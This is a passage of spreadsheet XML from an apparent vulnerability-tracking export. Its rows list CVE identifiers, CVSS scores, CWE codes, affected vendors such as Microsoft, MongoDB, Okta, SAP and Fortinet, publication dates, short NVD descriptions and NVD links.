          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76968</t>
        </is>
      </c>
      <c r="D354" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K354" s="5" t="inlineStr"/>
      <c r="L354" s="5" t="inlineStr"/>
      <c r="M354" s="5" t="inlineStr"/>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q354" s="5" t="inlineStr"/>
      <c r="R354" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="S354" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76968</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76971</t>
        </is>
      </c>
      <c r="D355" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K355" s="5" t="inlineStr"/>
      <c r="L355" s="5" t="inlineStr"/>
      <c r="M355" s="5" t="inlineStr"/>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q355" s="5" t="inlineStr"/>
      <c r="R355" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S355" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76971</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78453</t>
        </is>
      </c>
      <c r="D356" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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6" s="5" t="inlineStr"/>
      <c r="M356" s="5" t="inlineStr"/>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q356" s="5" t="inlineStr"/>
      <c r="R356" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S356" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="T356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78453</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82059</t>
        </is>
      </c>
      <c r="D357" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E357" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K357" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q357" s="5" t="inlineStr"/>
      <c r="R357" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="S357"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T357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82059</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82069</t>
        </is>
      </c>
      <c r="D358" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K358" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L358" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q358" s="5" t="inlineStr"/>
      <c r="R358" s="5" t="inlineStr">
        <is>
          <t>CWE-212</t>
        </is>
      </c>
      <c r="S358"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T358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82069</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84391</t>
        </is>
      </c>
      <c r="D359" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K359" s="5" t="inlineStr"/>
      <c r="L359" s="5" t="inlineStr"/>
      <c r="M359" s="5" t="inlineStr"/>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q359" s="5" t="inlineStr"/>
      <c r="R359" s="5" t="inlineStr">
        <is>
          <t>CWE-457</t>
        </is>
      </c>
      <c r="S359" s="5" t="inlineStr">
        <is>
          <t>A use of uninitialized variable vulnerability in Fortinet FortiAnalyzer 7.6.3 through 7.6.6 may allow attacker to denial of service via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="T359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84391</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69874</t>
        </is>
      </c>
      <c r="D360" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E360" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K36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60" s="5" t="inlineStr"/>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q360" s="5" t="inlineStr"/>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S360" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69874</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69878</t>
        </is>
      </c>
      <c r="D361" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E361" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F361" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K361" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L361" s="5" t="inlineStr"/>
      <c r="M361" s="5" t="inlineStr"/>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q361" s="5" t="inlineStr"/>
      <c r="R361" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S361" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69878</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71338</t>
        </is>
      </c>
      <c r="D362" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E362" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F362" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K362" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L362" s="5" t="inlineStr"/>
      <c r="M362" s="5" t="inlineStr"/>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr">
        <is>
          <t>2026-09-15</t>
        </is>
      </c>
      <c r="Q362" s="5" t="inlineStr"/>
      <c r="R362" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="S362" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Failover Cluster allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71338</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77887</t>
        </is>
      </c>
      <c r="D363" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K363" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L363" s="5" t="inlineStr"/>
      <c r="M363" s="5" t="inlineStr"/>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q363" s="5" t="inlineStr"/>
      <c r="R363" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S363" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77887</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77891</t>
        </is>
      </c>
      <c r="D364" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K364" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L364" s="5" t="inlineStr"/>
      <c r="M364" s="5" t="inlineStr"/>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q364" s="5" t="inlineStr"/>
      <c r="R364" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S364" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77891</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86590</t>
        </is>
      </c>
      <c r="D365" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E365" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F365" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K365" s="5" t="inlineStr"/>
      <c r="L365" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q365" s="5" t="inlineStr"/>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S365" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86590</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78552</t>
        </is>
      </c>
      <c r="D366" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E366" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F366" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr">
        <is>
          <t>nginx, okta</t>
        </is>
      </c>
      <c r="K366" s="5" t="inlineStr"/>
      <c r="L366" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q366" s="5" t="inlineStr"/>
      <c r="R366" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S366" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway does not apply its Lua directive restriction to the application-level custom configuration field. The field is interpolated directly into the nginx server block without inspection, resulting in execution of injected directives.</t>
        </is>
      </c>
      <c r="T366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78552</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78622</t>
        </is>
      </c>
      <c r="D367" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K367" s="5" t="inlineStr"/>
      <c r="L367" s="5" t="inlineStr"/>
      <c r="M367" s="5" t="inlineStr"/>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q367" s="5" t="inlineStr"/>
      <c r="R367" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S367"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T367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78622</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82056</t>
        </is>
      </c>
      <c r="D368" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E368" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F368" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K368" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L368" s="5" t="inlineStr"/>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q368" s="5" t="inlineStr"/>
      <c r="R368" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S368"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T368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82056</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82063</t>
        </is>
      </c>
      <c r="D369" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K369" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q369" s="5" t="inlineStr"/>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S369"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T369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82063</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70091</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K370" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q370" s="5" t="inlineStr"/>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S370" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows DNS allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="T370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70091</t>
        </is>
      </c>
    </row>
